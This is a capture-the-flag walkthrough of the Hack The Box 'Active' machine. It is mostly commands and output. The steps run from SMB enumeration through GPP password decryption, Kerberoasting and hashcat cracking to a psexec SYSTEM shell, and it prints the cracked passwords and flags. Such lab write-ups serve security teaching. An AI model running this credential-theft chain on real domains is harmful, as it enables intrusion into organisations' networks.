Overview

Walkthrough

Recon

nmap

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2021-07-02 09:48:09Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC

By looking into nmap results, we can identify that the host is Domain Controller.

Enumerating Open Shares

Ξ ~/tmp → smbclient -L \\\\10.10.10.100 -U '' -N                      

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      

Found open folder Replication, lets dump it is content

Ξ Active/dump → smbclient \\\\10.10.10.100\\Replication -U '' -N 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

GPP Stored Credentials

The file contain AD Group Policy Preferences (GPP), lets search for any encrypted password.

GPP Stored Credentials is old vulnerability which is currently patched, for further reading see the this link: https://adsecurity.org/?p=2288

Usually GPP encrypted passwords is stored in the variable cpassword we can use grep to search for cpassword variable:

Ξ Active/dump → grep -iR "cpassword"                                        
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

Found GPP encypted password for the user svc_tgs which is: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Kali linux have built in tool that can decrypt GPP Encrypted password gpp-decrypt:

Ξ OldBoxes/shocker → gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

svc_tgs user password is GPPstillStandingStrong2k18

Request SPN Service Account Tickets

After obtain svc_tgs credentials lets use it to request SPN Service accounts tickets:

Ξ Active/dump → GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs -request 
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b43bf8023365ea1108b5424b53c2a450$146e01d19a37eca33003ca119ded7a074639abadba134eeed77439ba7679c5dda70afc803385e024a64b2fac83e29d1d75d81f0573aa0cce61870aee4eab395ca3b48146e75ade21025ef408446ad90763ef6e17cea403f82eacf20178fc78a3b6cc8694136a816c8aeac46fd23cf95729a287ea6c8232c554a7ce1f2244df1df6c8a34fcfac5199147f26249343a1f34f224716098568e7eb7c490760f1bc90100536274d89bba11e134c6df6b8d625d3805f9a60dfc1e47b15b038ba8c43fbf4d27249f92ac80fc8828d1a29b601c4d9271774239400b95c7fd530991ff5b37b5c26b192b0cfbea2af928adf902ea373ac9997e6f3379345c5f324fd4e8ab76c1dc98c71cc2e78d2e360dfa1196d7319f5ed40d3011372c91a6f0411dd56af96bc4b3af8bb29c68462313b56d2b86aa0b60448ad8b2a7f878c74621388ea0dcb7a0fe165eca97dbd549e2b2e34654cca5d6ce1d6d2c697ae41bd24d599d0f6ad74fd1f063c66ec6a87029baa4731d0be51f63a54d7bcdc7ba13f2e834c381fb1d46e7c6df8675dc85b6ccb328494635a2c2ee48cbc9d2c8514b8884d945f796cb4c468fa631c2e33253da49cd16cd46fc170e66435d5395080af0ebffb39e6d514524258accb383e7d5f65d4536255ee19d381ee1fea36e746eea0333f8126c4b22c9ff9d79c77d03abff93318e9277f75d81fcd93ea1c039706f41585d2383e0af51b3f990cc2a32608a482d564455c405324e9b2f678300ff1056cfecd5d242bc39451f885f1441a4a80334ce19104accd3bed6476ea454d053c2d386078960a66df55c4706b945612fa712c4d4a70cb07c2f3d5a648e9620be5fb049e73bbe30bfeecf48f1f483bb5bed90337f4e56d033a1a3fce605d05043f1d24c1f73213a2591fa538f9215dee625df91a9157f09a074259b96a1993d045a59ae97103f8f2395866f3829fde0a7eb6ea3708982770649321534fd29ebbb8072e8a1ed7494e5967aa2526e572746c02e9ccb61d1738923c00fe9ab846c47712d8d5b0c9e8a0298c96321a0b5fd2f9ef31433043f8d219f80cffb98e86ce024a4e7ad3e61632a081a86d93b0554ec4d69d776ca9f8f8386d13c23a0a35138e998ce6029ae963b9964b14289de3e554e96be23b6ceb3469d8ef76e0d98a9faf7b32a4a0387aee9c48072245d926db2641379f7a79f26440465fff1340a5e4f5cec32166e780cb452e2e53e4975b5aac913e93175aa7c7a3b53477339d7c

We found Administrator ticket!

Let's crack it using hashcat

Active/dump → hashcat -a 0 -m 13100 admin-krb.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...

...

$krb5tgs$23$*Administrator$...
....9d7c:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
....

Now obtained Administrator password! Which is Ticketmaster1968 we can now login into the target machine with full privileges.

HTB/Boxes → psexec.py administrator:'Ticketmaster1968'@10.10.10.100          
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file eWhpxQSR.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RfrB on 10.10.10.100.....
[*] Starting service RfrB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Now we can grap user.txt and root.txt flags

c:\Users>more svc_tgs\desktop\user.txt
86d67d8ba232bb6a254aa4d10159e983

c:\Users>more administrator\desktop\root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b